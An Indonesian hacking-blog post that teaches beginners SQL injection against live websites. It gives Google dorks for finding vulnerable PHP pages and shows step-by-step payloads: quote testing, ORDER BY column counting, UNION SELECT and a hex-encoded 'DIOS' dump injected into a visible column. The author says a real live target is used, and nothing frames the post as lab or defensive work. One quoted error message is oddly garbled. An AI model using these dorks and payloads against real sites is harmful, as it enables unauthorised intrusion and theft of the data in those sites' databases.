SQL Injection Pemula #1
Minggu, 13 Desember 2020
Kali ini gw bakal memberitahu cara mengeksekusi bug SQL Injection bagi pemula , sebelum lanjut gw mau jelasin secara singkat apa itu DIOS , DIOS ( Dump In One Shot ) adalah untuk memunculkan seluruh isi database dalam satu query aja. Oke langsung aja .
Bahan :
Dork
Dios
Dork :
inurl:book.php?id=
inurl:detail.php?id=
inurl:about.php?id=
inurl:gallery.php?id=
inurl:game.php?id=
inurl:artikel.php?id=
inurl:news.php?id=
inurl:news-detail.php?id=
Gapunya DIOS?
Tutor buat Dios? Klik gw
Okeh untuk Dork nya segitu ae :b
Okeh lanjut ke cara mengeksekusinya
Oh ya disini gw pake live target
Live Target :
Okeh yang pertama kalian buka dulu website nya nah dibelakang url ada id=42 nah itu adalah parameternya! , Okeh
Skrg kita tambahkan tanda petik ( ' ) dibelakang parameternya , contoh : id=42'
Kalau "error SQL syntax" seperti gambar dibawah berarti web itu lemah / vuln terhadap SQL Injection
setelah dikira vuln kalian langsung menambahkan +ORDER+BY+1--+- di belakang tanda petik , contoh : id=42'+ORDER+BY+1--+-
Kalau web nya kembali seperti semula kalian naikan order nya dari 1 menjadi 2
Contoh : id=42'+ORDER+BY+2--+-
kalian naikan terus sampai tampilan web nya eror "Unknown Column on order Claude" seperti gambar dibawah
Nah gambar diatas kan menunjukan angka 8 didalam petik dua , berarti kita harus mengeksekusi nya di angka 7
Skrg kalian ubah +ORDER+BY+8--+- nya menjadi +UNION+SELECT+1,2,3,4,5,6,7--+-
cukup sampai 7 saja , contoh : id=42'+UNION+SELECT+1,2,3,4,5,6,7--+-
Nah kalo sudah melakukan union select, web nya akan menunjukan angka togel untuk kita masukan Dios, disini angka togelnya itu angka 2 dan 3 , nah disini gw bakal mengeksekusi dios gw di angka 2
Jadi angka 2 yang di UNION SELECT tadi kalian hapus dan ubah menjadi Dios kalian
Contoh : id=42'+UNION+SELECT+1,0x496e6a6563742042792053776970654d6f6f6e,3,4,5,6,7--+-
Sekian saja artikel dari gw
Best Regards,
SwipeMoon
ForceCyberTeam